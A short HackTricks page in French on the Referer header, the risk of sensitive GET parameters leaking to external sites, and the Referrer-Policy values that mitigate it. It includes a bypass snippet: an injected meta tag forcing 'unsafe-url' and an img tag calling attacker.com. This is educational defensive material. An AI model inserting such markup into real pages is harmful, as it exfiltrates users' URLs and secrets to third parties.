tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

En-tĂȘtes de rĂ©fĂ©rent et politique

Le rĂ©fĂ©rent est l'en-tĂȘte utilisĂ© par les navigateurs pour indiquer quelle Ă©tait la page prĂ©cĂ©dente visitĂ©e.

Informations sensibles divulguées

Si Ă  un moment donnĂ© Ă  l'intĂ©rieur d'une page web, des informations sensibles se trouvent dans les paramĂštres de requĂȘte GET, si la page contient des liens vers des sources externes ou si un attaquant est capable de faire/suggĂ©rer (ingĂ©nierie sociale) Ă  l'utilisateur de visiter une URL contrĂŽlĂ©e par l'attaquant. Il pourrait ĂȘtre en mesure d'exfiltrer les informations sensibles Ă  l'intĂ©rieur de la derniĂšre requĂȘte GET.

Atténuation

Vous pouvez faire en sorte que le navigateur suive une politique de référent qui pourrait éviter que les informations sensibles soient envoyées à d'autres applications web :

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contre-mesures

Vous pouvez contourner cette rĂšgle en utilisant une balise meta HTML (l'attaquant doit exploiter une injection HTML) :

html
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Défense

Never put any sensitive data inside GET parameters or paths in the URL.

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks